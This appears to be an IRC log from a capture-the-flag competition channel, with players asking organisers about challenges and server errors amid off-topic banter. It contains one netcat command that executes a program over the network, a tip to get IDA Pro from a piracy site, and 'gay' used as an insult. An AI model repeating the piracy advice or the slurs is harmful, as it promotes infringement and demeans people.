  5591. (19:31:51) ••• qUit: (Otacon22) ([email protected]) Ping timeout: 252 seconds
  5592. (19:32:03) (tsuro) that challenge is awesome btw^^
  5593. (19:32:08) (+mserrano) 1 -> Chance, 2 -> Chance, 3 -> r250, 4 -> pwn200, 5-> forensics 350, 6 -> chance
  5594. (19:32:46) (+tylerni7) tsuro: awesie was the creator :)
  5595. (19:32:55) (+awesie) tsuro: \o/ thanks :)
  5596. (19:33:02) ••• qUit: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
  5597. (19:33:54) • |x_x| must note that mixing php and asp is a sin against all things of the mortal realm.
  5598. (19:34:04) ••• jOin: (l0stm0n3y) ([email protected])
  5599. (19:34:23) (Kasalehlia) s/mixing//
  5600. (19:34:33) (|x_x|) :D
  5601. (19:34:57) ••• pArt: (pcc7) (ca780766@gateway/web/freenode/ip.202.120.7.102)
  5602. (19:35:07) ••• qUit: (johnCool) ([email protected]) Quit: bb
  5603. (19:35:11) ••• jOin: (pcc7) (ca780766@gateway/web/freenode/ip.202.120.7.102)
  5604. (19:35:36) (pcc7) any help for pyjail?
  5605. (19:35:47) ••• jOin: (erketu) ([email protected])
  5606. (19:35:57) ••• jOin: (dvddaver) ([email protected])
  5607. (19:36:02) (inter) RYAN
  5608. (19:36:06) (inter) WHERE ARE YOU RYAN
  5609. (19:36:13) (shadghost) HE DIED
  5610. (19:36:14) (shadghost) SORRY
  5611. (19:36:36) ••• qUit: (chrissing) ([email protected]) Remote host closed the connection
  5612. (19:36:48) (+clockish) pcc7: pyjail is me, feel free to pm
  5613. (19:37:12) ••• jOin: (chrissing) ([email protected])
  5614. (19:37:36) (inter) clockish: what is worse? pyjail or bashjail
  5615. (19:37:52) (|x_x|) alcatraz
  5616. (19:38:17) (inter) wow
  5617. (19:38:19) (inter) mac doesnt have
  5618. (19:38:19) (inter) wget?
  5619. (19:38:32) ••• qUit: (erketu1) ([email protected]) Ping timeout: 250 seconds
  5620. (19:38:38) (jmgrosen) what about reekee?
  5621. (19:38:42) ••• pArt: (dvddaver) ([email protected])
  5622. (19:38:51) (jmgrosen) that's really annoying me by this point
  5623. (19:39:01) (jmgrosen) any hints from admins? :P
  5624. (19:39:07) (+tylerni7) no :P
  5625. (19:39:39) (jmgrosen) our best guess by now is that you found a 0day in django
  5626. (19:39:51) (+tylerni7) -_-
  5627. (19:39:53) (poppopret) where can we get a free version of ida 64-bit?
  5628. (19:40:01) (+tylerni7) poppopret: the pirate bay
  5629. (19:40:16) ([CISSP]HoLyVieR) I think the demo version could work
  5630. (19:40:16) (ryan-c) poppopret: There is no free version, only a warez version.
  5631. (19:40:22) (corpille) any better hint on mtpox ?
  5632. (19:41:00) (poppopret) i dont think it works for the demo version...it says
  5633. (19:41:06) (ryan-c) corpille: The challenge was created by special guest MagicalTux. He's very proud of it.
  5634. (19:41:08) (x56) IDA 5.0 is free for windows, IDA 6.0 has a demo
  5635. (19:41:09) (poppopret) "please use IDA Pro 64-bit to load 64-bit files"
  5636. (19:41:20) (x56) but 64-bit has no demo
  5637. (19:41:24) (x56) or free version
  5638. (19:41:25) ••• jOin: (nonroot) ([email protected])
  5639. (19:41:26) (x56) or anything
  5640. (19:41:27) ••• qUit: (lkwpeter) ([email protected]) Quit: Leaving.
  5641. (19:41:33) (Adran) ryan-c: lol
  5642. (19:41:34) ••• qUit: (chrissing) ([email protected]) Ping timeout: 250 seconds
  5643. (19:41:36) (|x_x|) Warez is bad.
  5644. (19:42:16) (ryan-c) also, i hear the salt is 'Bitcoins'
  5645. (19:42:29) (+tylerni7) :| it is not
  5646. (19:42:43) (|x_x|) mmm salt
  5647. (19:42:44) (corpille) ryan-c nice try :p
  5648. (19:42:53) (ryan-c) trolololol
  5649. (19:44:09) (corpille) so no real hint ?
  5650. (19:45:22) (ryan-c) well, I'm just playing in the ctf. I think one of the pctf guys might find me at defcon and pwn me if i give unauthorized hints.
  5651. (19:45:43) (+tylerni7) corpille: there aren't any other official hints released for it
  5652. (19:45:58) (+tylerni7) if you have specific questions, I might answer them in pm if they don't give too much away
  5653. (19:46:02) (_joeje_) who wrote kappa?
  5654. (19:46:07) (_joeje_) i have question
  5655. (19:46:19) (ryan-c) do you have stairs in your house?
  5656. (19:46:20) (+tylerni7) _joeje_: dickoff did
  5657. (19:46:48) ••• jOin: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
  5658. (19:46:51) ••• jOin: (Otacon22) ([email protected])
  5659. (19:47:04) (thedoctordmc_) as it turns out, multiplication is much harder than I rememberec.
  5660. (19:47:23) (Ymgve) multiplication is just repeated addition
  5661. (19:48:05) ••• qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
  5662. (19:48:25) ••• jOin: (oclarocque_) (628fd7e4@gateway/web/freenode/ip.98.143.215.228)
  5663. (19:49:10) ••• qUit: (Ph4te) ([email protected]) Quit: Leaving.
  5664. (19:49:22) ••• qUit: (sewilton) ([email protected]) Ping timeout: 250 seconds
  5665. (19:49:30) ••• jOin: (jarCrack) ([email protected])
  5666. (19:51:43) (rliu) anyone else getting a 502 on play.plaidctf.com?
  5667. (19:52:05) (hasB4K) i have an error 502 too
  5668. (19:52:06) (ebeip90) who to ping about doge?
  5669. (19:52:15) (+clockish) ebeip90: me
  5670. (19:52:19) ••• jOin: (shuckens) ([email protected])
  5671. (19:52:20) (+clockish) hasB4K: refresh a lot
  5672. (19:52:26) (+clockish) server occationally gets sad
  5673. (19:52:40) (hasB4K) yep it works again :)
  5674. (19:53:35) ••• qUit: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
  5675. (19:53:46) ••• pArt: (jablonskim) ([email protected])
  5676. (19:54:19) ••• qUit: (inter) ([email protected]) Ping timeout: 246 seconds
  5677. (19:54:43) ••• qUit: (ccmndhd) ([email protected]) Quit: This computer has gone to sleep
  5678. (19:55:13) ••• qUit: (kris) ([email protected]) Ping timeout: 245 seconds
  5679. (19:57:05) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
  5680. (19:57:58) ••• jOin: (deject3d) ([email protected])
  5681. (19:59:04) ••• jOin: (inter) ([email protected])
  5682. (19:59:11) (inter) whos in charge of curlcore?
  5683. (19:59:23) (+clockish) inter: me
  5684. (19:59:25) (inter) did you really overwrite the return address -.-
  5685. (19:59:38) ••• pArt: (l0stm0n3y) ([email protected])
  5686. (20:00:50) (rliu) what does the "chronosphere discharge in a few seconds" mean
  5687. (20:01:04) (+tylerni7) new problem coming out
  5688. (20:01:07) (+tylerni7) read teh rulez
  5689. (20:01:14) (+tylerni7) :|
  5690. (20:01:26) ••• jOin: (nofiki1) ([email protected])
  5691. (20:02:03) ••• qUit: (paul66) ([email protected]) Remote host closed the connection
  5692. (20:03:09) ••• qUit: (deject3d) ([email protected]) Quit: Computer has gone to sleep.
  5693. (20:05:31) ••• jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
  5694. (20:09:34) (Luffy) ERROR!
  5695. (20:10:43) (Luffy) itadakimasu
  5696. (20:10:56) ••• qUit: ([CISSP]HoLyVieR) ([email protected]) Quit: Leaving
  5697. (20:11:39) (Adran) anyone around I can check the steno with?
  5698. (20:11:55) (ebeip90) yeah i can take down your court case
  5699. (20:11:57) (ebeip90) love stenography
  5700. (20:12:45) (Adran) yeah, my brain is fried. :P
  5701. (20:12:50) (Adran) doge doge
  5702. (20:12:58) (WuZ) wow
  5703. (20:13:08) ••• qUit: (nonroot) ([email protected]) Ping timeout: 245 seconds
  5704. (20:13:08) (WuZ) very ctf
  5705. (20:13:15) (WuZ) such stegano
  5706. (20:13:15) (+clockish) very flage
  5707. (20:13:20) (WuZ) much trouble
  5708. (20:13:23) (+clockish) Adran: oh, that's me
  5709. (20:13:25) (Adran) no spell
  5710. (20:13:52) (inter) i have winpcap
  5711. (20:13:54) (inter) but i dont have wireshark
  5712. (20:13:56) (inter) what is this magic
  5713. (20:14:04) ••• jOin: (zorq) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
  5714. (20:14:26) (zorq) who solved whatcat?
  5715. (20:14:36) (bobsteam) noone
  5716. (20:14:38) (+tylerni7) zorq: I made the problem
  5717. (20:14:42) (+tylerni7) if you have questions you can pm me
  5718. (20:14:43) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  5719. (20:15:03) ••• jOin: (SaWsi3gE) ([email protected])
  5720. (20:15:16) ••• qUit: (snoopybbt) ([email protected]) Quit: Leaving.
  5721. (20:15:24) (zorq) ok, anyway it's much more harder than other webs (and got only +100 more)
  5722. (20:15:36) (Luffy) i have a question
  5723. (20:15:38) (Luffy) how do you do it :)
  5724. (20:15:54) (iago-x86) Luffy: carefully
  5725. (20:16:00) ••• jOin: (snoopybbt) ([email protected])
  5726. (20:16:08) (Luffy) words from the wise
  5727. (20:16:24) (Luffy) why would you call yourself a shakespearean character name
  5728. (20:16:30) (Luffy) Iago :(
  5729. (20:16:36) (Luffy) shakespeare is stupid
  5730. (20:16:47) (iago-x86) You're stupid
  5731. (20:16:49) (iago-x86) iago was awesome
  5732. (20:16:53) (iago-x86) :)
  5733. (20:16:54) (Luffy) iago is gay
  5734. (20:16:59) (iago-x86) So am I
  5735. (20:17:04) • iago-x86 throws down
  5736. (20:17:06) (Luffy) ok lets take a vote
  5737. (20:17:11) (Luffy) who would rather watch anime
  5738. (20:17:14) (Luffy) or read a book
  5739. (20:17:22) (Luffy) sorry
  5740. (20:17:23) (iago-x86) Man, you're awfully sensitive about this! :)
  5741. (20:17:25) (Luffy) read a "play"
  5742. (20:17:26) (+tylerni7) depends on the anime and the book, probably
  5743. (20:17:31) (Luffy) ok
  5744. (20:17:36) (oclarocque_) who's the creator of rendezvous?
  5745. (20:17:37) (Luffy) who would rather read othello
  5746. (20:17:38) ••• jOin: (c0ax) ([email protected])
  5747. (20:17:39) (+clockish) how about watching a play?
  5748. (20:17:40) (Luffy) or watch One Piece
  5749. (20:17:51) (+mserrano) oclarocque_: houqp
  5750. (20:17:55) (+clockish) Shakespeare is meant to be watched on stage, not read!
  5751. (20:18:02) (oclarocque_) thanks
  5752. (20:18:33) ••• qUit: (SaWsi3gE) ([email protected]) Remote host closed the connection
  5753. (20:18:33) (Luffy) ok
  5754. (20:18:41) (Luffy) who would rather watch Othello on a stage
  5755. (20:18:43) (ebeip90) clockish: pretty sure Shakespeare is meant to be filmed under the direction of Joss Whedon
  5756. (20:18:47) (|x_x|) I'm hungry. Someone order me a pizza. Thank you.
  5757. (20:18:47) (Luffy) or watch One Piece on their computer
  5758. (20:18:58) (+clockish) ebeip90: Heh, I missed that one, was it any good?
  5759. (20:19:05) (ebeip90) Much Ado was surprisingly good
  5760. (20:19:14) • +clockish adds it to his list
  5761. (20:19:44) (livinded) what infrastructure does plaidctf run on?
  5762. (20:19:49) (|x_x|) ECW
  5763. (20:19:54) (WuZ) HAL 9000
  5764. (20:19:55) (+mserrano) Much Ado was very good
  5765. (20:20:01) (+tylerni7) livinded: EC2
  5766. (20:20:03) (|x_x|) I'm afraid I can't allow you to do that, WuZ.
  5767. (20:20:11) (WuZ) :(
  5768. (20:20:12) (+mserrano) I'm afraid I can't do that, Dave.
  5769. (20:20:14) ••• jOin: (cool_guy) ([email protected])
  5770. (20:20:19) (WuZ) you suffer?
  5771. (20:20:23) (|x_x|) Always suffer.
  5772. (20:20:26) (Luffy) Othello or One Piece place your votes!
  5773. (20:20:38) (livinded) tylerni7: can you bump up the instance types or throw an elb in front of a few for the webs. They are crawling
  5774. (20:20:43) (|x_x|) My votes go to the Straw Hats performing Othella.
  5775. (20:20:43) (+tylerni7) livinded: django... gunicorn.. memcached... nginx... cai_ and awesie were the only ones brave enough to set it up
  5776. (20:20:52) (Luffy) ban his ass please
  5777. (20:20:52) (+tylerni7) livinded: which ones
  5778. (20:20:52) (Zoro) It's multiple choice guys
  5779. (20:20:58) (Zoro) my goodness
  5780. (20:20:59) (|x_x|) And I made my own choice!
  5781. (20:21:03) (livinded) mtpox
  5782. (20:21:05) (Zoro) you sir
  5783. (20:21:09) (livinded) and the boards
  5784. (20:21:12) (livinded) board*
  5785. (20:21:24) (+tylerni7) those seem fine from here...
  5786. (20:21:32) (+clockish) the board occationally 502s, but it's generally fine now.
  5787. (20:21:41) (+clockish) we can give mtpox a nudge
  5788. (20:21:42) (+tylerni7) in fact, mtpox loads faster than mtgox does, for me
  5789. (20:21:52) ••• qUit: (phiber_) ([email protected]) Ping timeout: 250 seconds
  5790. (20:21:59) (rray) tylerni7: that's not saying much
  5791. (20:22:04) (+tylerni7) :P
  5792. (20:22:07) (livinded) hmmm, maybe it's my side. Everything else is pretty snappy though
  5793. (20:22:16) (inter) largest dickhole award goes to
  5794. (20:22:19) (inter) *drumroll*
  5795. (20:22:29) (Zoro) you
  5796. (20:22:33) (inter) *drumroll pls*
  5797. (20:22:36) (Zoro) and a few other people
  5798. (20:22:42) • |x_x| rolls a drum across the channel.
  5799. (20:22:42) (+clockish) no, I alone deserve this award.
  5800. (20:22:53) (Zoro) the kind folks here who put together this RSA
  5801. (20:23:01) (inter) clockish! contratulations clockish, recieve your prize @ pyjail
  5802. (20:23:06) (|x_x|) And not Multiplication is Hard?
  5803. (20:23:06) (+clockish) Zoro oh, that's tylerni7
  5804. (20:23:08) (|x_x|) >_>
  5805. (20:23:14) (+mserrano) blame me for that one
  5806. (20:23:15) (inter) <_<
  5807. (20:23:17) ••• pArt: (erketu) ([email protected])
  5808. (20:23:21) (Luffy) tyler quit with the rsa! nobody likes it XD
  5809. (20:23:25) (WuZ) mserrano: nice one
  5810. (20:23:27) ••• qUit: (DeadheadTn) ([email protected]) Quit: Leaving
  5811. (20:23:29) (+mserrano) rsa is a wonderful problem
  5812. (20:23:32) • +mserrano likes it
  5813. (20:23:35) (Zoro) >_>
  5814. (20:23:37) (Zoro) <_<
  5815. (20:23:40) (iago-x86) Either kappa is ridiculous for 275, or I'm missing something big
  5816. (20:23:42) (Zoro) *sees no one.*
  5817. (20:23:42) (inter) mserrano: the trolling became reallllllly real on that multiplication
  5818. (20:24:01) • iago-x86 is banging his head
  5819. (20:24:01) (|x_x|) I still haven't gotten that one. >_>
  5820. (20:24:07) (jmgrosen) tylerni7: who wrote reekee?
  5821. (20:24:10) (+tylerni7) me
  5822. (20:24:11) (|x_x|) Evil arithmetic.
  5823. (20:24:17) (jmgrosen) ah :P
  5824. (20:24:18) ••• jOin: (rvpersie) ([email protected])
  5825. (20:24:20) (inter) mserrano: you should give him some hints
  5826. (20:24:21) (inter) like
  5827. (20:24:25) (inter) what is *
  5828. (20:24:26) ••• qUit: (Hertz__) ([email protected])
  5829. (20:24:28) (+tylerni7) jmgrosen: blame ricky for the idea though
  5830. (20:24:30) (|x_x|) Love?
  5831. (20:24:32) (+mserrano) iago-x86: our pwnables may have been slightly underestimated
  5832. (20:24:34) (+mserrano) we will see
  5833. (20:24:39) (|x_x|) Baby don't hurt me. Don't hurt me, no more.
  5834. (20:24:39) (Luffy) see iago
  5835. (20:24:43) (inter) dude
  5836. (20:24:44) (inter) i sang that
  5837. (20:24:44) (Luffy) youre banging you head
  5838. (20:24:48) (inter) a day ago
  5839. (20:24:51) (Luffy) cuz all you do is read shakespear
  5840. (20:24:52) (Luffy) e
  5841. (20:24:57) (iago-x86) mserrano: Heh
  5842. (20:24:57) (inter) in hope to escape
  5843. (20:24:58) (inter) pyjail
  5844. (20:25:04) (Luffy) maybe if you did some math you would know how to do multiplication is hard
  5845. (20:25:07) (inter) do you know kimchi?
  5846. (20:25:11) (inter) do you know bool go gi?
  5847. (20:25:14) (inter) do you know psy?
  5848. (20:25:14) (+mserrano) maybe I underestimated wheee as well
  5849. (20:25:16) (dkohlbre) mserrano: seriosuly, i have to install a whole new version of debian to get packages for a 100pt pwnable? no thanks :P
  5850. (20:25:22) (inter) do you know kal bi?
  5851. (20:25:25) ••• qUit: (reanimus) ([email protected]) Quit: reanimus
  5852. (20:25:30) (+mserrano) dkohlbre: lol
  5853. (20:25:38) (dkohlbre) stable forever
  5854. (20:25:38) (iago-x86) Kasalehlia: You don't really have to run it locally
  5855. (20:25:39) (oldtopman) inter: What's this about korea?
  5856. (20:25:54) (Zoro) you're gonna lose your neofrontal cortex after awhile iago-x86
  5857. (20:25:56) (inter) oldtopman: sweg
  5858. (20:26:03) (Zoro) gorea
  5859. (20:26:20) (+mserrano) at least I'm glad I named ezhp the way I did
  5860. (20:26:22) (+mserrano) and that it was in fact ez
  5861. (20:26:29) (Zoro) bull
  5862. (20:26:29) (Kasalehlia) iago-x86: thanks for the hint! do you mind telling me what to run?
  5863. (20:26:47) (Luffy) hes gonna tell you to run Othello
  5864. (20:26:50) (Luffy) don't listen to him
  5865. (20:26:54) (inter) mserrano: tiffany is yours too right?
  5866. (20:26:54) (dkohlbre) mserrano: it was, in fact, easy, minus the incredibly awful tooling problems i had on my end :/
  5867. (20:26:58) (iago-x86) Kasalehlia: Are you talking about tenement?
  5868. (20:26:59) (Luffy) run One Piece instead
  5869. (20:27:02) (iago-x86) Luffy: Okay, I get it. :P
  5870. (20:27:02) (+mserrano) inter: yes
  5871. (20:27:08) (inter) i knew it
  5872. (20:27:16) (Kasalehlia) iago-x86: i dont know, you just highlighted me
  5873. (20:27:39) (iago-x86) Kasalehlia: ooh, I assumed it was tenement, since that's a pwn 100
  5874. (20:27:49) ••• nIck: (Luffy) is now known as (Shakespeare_is_g)
  5875. (20:27:50) (Kasalehlia) iago-x86: why me?
  5876. (20:27:54) (jarCrack) can you shaew rhw awevwe code for ezhp?
  5877. (20:27:58) (+mserrano) Kasalehlia: I think he meant to hilight dkohlbre and just mised the d
  5878. (20:27:59) ••• nIck: (Shakespeare_is_g) is now known as (Shakespeareisgay)
  5879. (20:28:00) (dkohlbre) iago-x86: you meant me :P and yes, tenement
  5880. (20:28:00) (iago-x86) Probably failed autocomplete
  5881. (20:28:01) (+mserrano) jarCrack: wat
  5882. (20:28:03) ••• qUit: (zorq) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Quit: Page closed
  5883. (20:28:07) (iago-x86) Sorry, it's been a long day :)
  5884. (20:28:08) (Shakespeareisgay) so uh
  5885. (20:28:09) (vladum_) who can i ask something about kpop?
  5886. (20:28:13) (+mserrano) vladum_: me
  5887. (20:28:16) (Kasalehlia) iago-x86: k =) it was nice talking to you
  5888. (20:28:22) ••• nIck: (Shakespeareisgay) is now known as (ShakespeareIsGay)
  5889. (20:28:23) (+mserrano) inter: what made you think tiffany was me? :P
  5890. (20:28:31) (jarCrack) can you share the server code for ezhp?
  5891. (20:28:35) (ShakespeareIsGay) did you guys know that shakespeare was bisexual?
  5892. (20:28:41) (+mserrano) jarCrack: you get the binary
  5893. (20:29:02) ••• jOin: (kris) ([email protected])
  5894. (20:29:04) (jarCrack) thats anotherone i think as it doesnt open port does it?
  5895. (20:29:10) ••• jOin: (nonroot) ([email protected])
  5896. (20:29:15) (iago-x86) ezhp is my favourite level so far, cuz I finished it. :)
  5897. (20:29:21) (ShakespeareIsGay) wow
  5898. (20:29:25) (ShakespeareIsGay) *shakes head*
  5899. (20:29:30) (+mserrano) jarCrack: It's the same binar
  5900. (20:29:31) (WuZ) is the flag of harry_potter a picture of Emma Watson?
  5901. (20:29:32) (+mserrano) binary*
  5902. (20:29:37) (+mserrano) jarCrack: it's running under xinetd
  5903. (20:29:54) (tomcr00se) err, is harry potter doable?
  5904. (20:29:55) (+mserrano) so the fork/accept loop and the dup2'ing is done by xinetd
  5905. (20:30:24) (iago-x86) I use 'nc -l -e' for testing
  5906. (20:30:35) (jarCrack) ah i see
  5907. (20:30:36) (iago-x86) It's the same thing, but quicker for a quick test
  5908. (20:30:45) (ShakespeareIsGay) don't listen to him
  5909. (20:30:48) (+mserrano) tomcr00se: should be
  5910. (20:30:49) (jarCrack) should ve known this earlier :SS
  5911. (20:31:02) (_blasty_) 0x420 tym3
  5912. (20:31:06) (tjbecker) iago-x86: can't handle multiple clients, though
  5913. (20:31:32) (Zoro) a
  5914. (20:31:33) (ShakespeareIsGay) tjbecker: its because he likes shakespeare
  5915. (20:32:01) (+tylerni7) tomcr00se: awesie is throwing his soln at it now
  5916. (20:32:08) ••• qUit: (kris) ([email protected]) Remote host closed the connection
  5917. (20:32:08) (iago-x86) Right, so it's no good for production
  5918. (20:32:13) (tjbecker) does anyone not like Shakespeare?
  5919. (20:32:14) ••• nIck: (ShakespeareIsGay) is now known as (Luffy)
  5920. (20:32:14) (iago-x86) Just handy for quick testing
  5921. (20:32:20) (_blasty_) im not getting very far with haryr potter either
  5922. (20:32:24) (Luffy) lol
  5923. (20:32:41) (_blasty_) so im playing h4rry p0th34d ryte now, maybe it will improve things
  5924. (20:32:41) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  5925. (20:33:04) (+tylerni7) _blasty_: tomcr00se harry potter is working as intended
  5926. (20:33:11) (_blasty_) ok
  5927. (20:33:17) (+tylerni7) solution thrown at server, got key
  5928. (20:33:23) (_blasty_) notbad.jpg
  5929. (20:33:27) (+tylerni7) then md5d the services and verified they matched
  5930. (20:33:39) (+tylerni7) (awesie did this, not me, I'm not cool enough)
  5931. (20:33:43) (+tylerni7) anyway, should be good :)
  5932. (20:34:04) (WuZ) I think tomcr00se would be more sucessfull on a impossible_mission chall
  5933. (20:34:08) • WuZ best joke eva
  5934. (20:34:11) ••• qUit: (inter) ([email protected]) Ping timeout: 240 seconds
  5935. (20:34:35) ••• qUit: (dracu) ([email protected]) Quit: Leaving.
  5936. (20:34:55) ••• jOin: (phiber_) ([email protected])
  5937. (20:35:37) (Luffy) atekemo yume wo
  5938. (20:35:41) (Luffy) kakeatsume
  5939. (20:35:51) (Luffy) sagashimono sagashi ni yuku no sai
  5940. (20:35:56) (Luffy) One Piece!
  5941. (20:36:15) (+clockish) less cartoons, more hacking plz
  5942. (20:36:17) (Adran) why is freya 404ing
  5943. (20:36:30) (Luffy) not a cartoon :(
  5944. (20:36:33) (Luffy) its anime :)
  5945. (20:36:49) (+mserrano) Adran: one of the servers has it the other doesn't
  5946. (20:36:57) (Adran) is that a feature?
  5947. (20:37:07) (+mserrano) nah it's a mistake
  5948. (20:37:09) (+mserrano) thanks for pointing it out
  5949. (20:37:13) (+mserrano) refresh a couple times and you should get it
  5950. (20:37:18) ••• pArt: (_eko) ([email protected])
  5951. (20:37:20) (|x_x|) So a Japanese cartoon?
  5952. (20:37:54) (Luffy) .... be quite lower life form
  5953. (20:38:01) (Adran) mserrano: yay that worked now
  5954. (20:38:13) (Luffy) quiet*
  5955. (20:38:14) (+mserrano) Adran: ok it should stop 404 now
  5956. (20:38:29) ••• jOin: (chrissing) ([email protected])
  5957. (20:40:05) ••• qUit: (rliu) (ad3d971b@gateway/web/freenode/ip.173.61.151.27) Ping timeout: 240 seconds
  5958. (20:40:31) (iago-x86) I've been stuck on kappa for awhile.. is there somebody I can explain what I'm doing to, to see if I'm on the right track?
  5959. (20:40:50) (+mserrano) iago-x86: you can pm me
  5960. (20:40:53) (iago-x86) Thanks!
  5961. (20:42:28) ••• qUit: (BinaryCrystal) ([email protected]) Read error: Connection reset by peer
  5962. (20:42:56) (Luffy) youre welcome :)
  5963. (20:44:35) ••• qUit: (abcert) ([email protected]) Ping timeout: 240 seconds
  5964. (20:46:28) (Luffy) youre right touchscreen laptops are the besst
  5965. (20:47:34) ••• jOin: (f00b4r_) ([email protected])
  5966. (20:48:59) ••• qUit: (nonroot) ([email protected]) Ping timeout: 240 seconds
  5967. (20:49:55) ••• jOin: (naam) ([email protected])
  5968. (20:50:05) ••• qUit: (pctf533) (46b9d762@gateway/web/freenode/ip.70.185.215.98) Ping timeout: 240 seconds
  5969. (20:50:35) ••• qUit: (pctf376) (46b9d762@gateway/web/freenode/ip.70.185.215.98) Ping timeout: 240 seconds
  5970. (20:52:57) ••• qUit: (Ymgve) ([email protected])
  5971. (20:53:24) ••• jOin: (woot_) (83c2fd17@gateway/web/freenode/ip.131.194.253.23)
  5972. (20:54:13) (woot_) love the doge :)
  5973. (20:54:59) (+clockish) i love the doge too
  5974. (20:55:05) (+clockish) wow, many love
  5975. (20:55:11) ••• qUit: (chunderstruck1) ([email protected]) Quit: Leaving.
  5976. (20:55:17) (Adran) much doge
  5977. (20:56:44) (+clockish) tomcr00se: is multiplication hard?
  5978. (20:57:53) (+mserrano) \o/ 0xffa
  5979. (20:58:00) (+mserrano) 2 solves in gcc
  5980. (20:58:08) (+mserrano) on*
  5981. (20:58:35) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  5982. (20:58:36) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  5983. (20:59:27) (woot_) I love doge...collecting dogecoin atm
  5984. (20:59:35) ••• qUit: (wolfpack) (9807491f@gateway/web/freenode/ip.152.7.73.31) Ping timeout: 240 seconds
  5985. (20:59:54) (+clockish) how do i buy dogecoin with bitcoin
  5986. (21:00:01) (+clockish) i wanna go all in to doge! :P
  5987. (21:00:05) (woot_) you can use an exchange :)
  5988. (21:00:09) (woot_) vault of satoshi maybe
  5989. (21:00:12) ••• qUit: (shuckens) ([email protected]) Quit: Leaving.
  5990. (21:00:15) (+clockish) that sounds hard
  5991. (21:00:23) (+mserrano) how do I buy dogecoin
  5992. (21:00:24) ••• qUit: (c0ax) ([email protected]) Quit: Leaving
  5993. (21:00:25) (+mserrano) with empty promises
  5994. (21:00:30) (+clockish) I don't trust exchanges
  5995. (21:00:38) (woot_) I only have a few dogecoin
  5996. (21:00:51) (saelo) anyone I can talk to about ezhp?
  5997. (21:00:51) (+mserrano) exchanges bleed coins
  5998. (21:00:55) (+mserrano) saelo: pm me
  5999. (21:00:56) (ryan-c) i keep my bitcoin under my mattress
  6000. (21:01:04) (ryan-c) it's safe there
  6001. (21:01:10) (woot_) and you can pay me in empty promises
  6002. (21:01:27) (woot_) Anyone actually mining?
  6003. (21:01:37) (+mserrano) how do you mine dogecoin
  6004. (21:01:48) (woot_) with cgminer or cudaminer :)
  6005. (21:02:00) (woot_) and then you throw your graphics card at it
  6006. (21:02:06) ••• qUit: (nodoc) ([email protected]) Quit: Leaving
  6007. (21:02:17) (woot_) http://hugelolcdn.com/i/240652.gif
  6008. (21:02:18) (ryan-c) are nvidia cards actually any good at gimped scrypt?
  6009. (21:02:38) (woot_) the new nvidia architecture coming out got a lot better at mining
  6010. (21:02:41) ••• jOin: (abcert) ([email protected])
  6011. (21:03:19) (woot_) this steg thing is not as easy as I thought for 100 points..or I'm overlooking something
  6012. (21:03:23) (ryan-c) who's challenge is curlcore?
  6013. (21:03:34) (+mserrano) ryan-c: clockish
  6014. (21:04:02) ••• jOin: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-adqrbntyqeceebtc)
  6015. (21:04:58) ••• jOin: (solo_) ([email protected])
  6016. (21:05:17) ••• qUit: (f00b4r_) ([email protected]) Quit: f00b4r_
  6017. (21:05:39) ••• qUit: (corewar) ([email protected]) Ping timeout: 245 seconds
  6018. (21:06:22) (woot_) Do there happen to be any former Trinity students at CM?
  6019. (21:07:25) (+tylerni7) trinity students?
  6020. (21:08:01) (woot_) Yeah, from Trinity university
  6021. (21:08:11) (+mserrano) beats me
  6022. (21:08:24) ••• jOin: (f00b4r_) ([email protected])
  6023. (21:08:34) (+frozencemetery) mserrano: they do? The monsters!
  6024. (21:08:47) (+mserrano) pls.
  6025. (21:09:42) (+clockish) you LIKE IT when they do?
  6026. (21:10:01) (+frozencemetery) clockish: well, that's what Tuesday's for
  6027. (21:10:27) (+clockish) oh right, BDSM tuesdays, forgot.
  6028. (21:10:43) (altf4) I'm starting to think that I don't even know what a cat is anymore...
  6029. (21:10:52) (+tylerni7) WHATS CAT?
  6030. (21:10:59) (+frozencemetery) altf4: XARGS CAT IS WATCHING YOU
  6031. (21:11:00) (+tylerni7) or is it... WHAT? SCAT?
  6032. (21:11:44) (+frozencemetery) tylerni7: I'd think you'd know all about what scat is
  6033. (21:12:05) ••• qUit: (jakemask) ([email protected]) Quit: jakemask
  6034. (21:12:20) ••• qUit: (oclarocque_) (628fd7e4@gateway/web/freenode/ip.98.143.215.228) Quit: Page closed
  6035. (21:13:19) (dedede) more crypto pls
  6036. (21:13:49) (namrog84) arghhhh my last hope, has failed
  6037. (21:14:05) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
  6038. (21:14:08) ••• jOin: (jakemask) ([email protected])
  6039. (21:14:23) ••• qUit: (bwn3r) (~n00b13@unaffiliated/nitsua) Ping timeout: 245 seconds
  6040. (21:15:08) ••• qUit: (corpille) ([email protected]) Quit: Lost terminal
  6041. (21:15:39) ••• jOin: (naam) ([email protected])
  6042. (21:16:16) ••• qUit: (jakemask) ([email protected]) Client Quit
  6043. (21:16:56) (+mserrano) dedede: have you solved rsa and whee?
  6044. (21:16:56) ••• qUit: (eastwolf_) ([email protected]) Read error: Connection reset by peer
  6045. (21:17:26) ••• jOin: (eastwolf_) ([email protected])
  6046. (21:18:27) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
  6047. (21:18:37) ••• pArt: (mapleray) ([email protected])
  6048. (21:19:15) ••• jOin: (kilmey) (5775c785@gateway/web/freenode/ip.87.117.199.133)
  6049. (21:19:17) ••• qUit: (scnarc) ([email protected]) Ping timeout: 252 seconds
  6050. (21:19:52) ••• qUit: (lfogel) ([email protected]) Remote host closed the connection
  6051. (21:19:53) (kilmey) how on hell so many teams solved whatscat... it's hard...
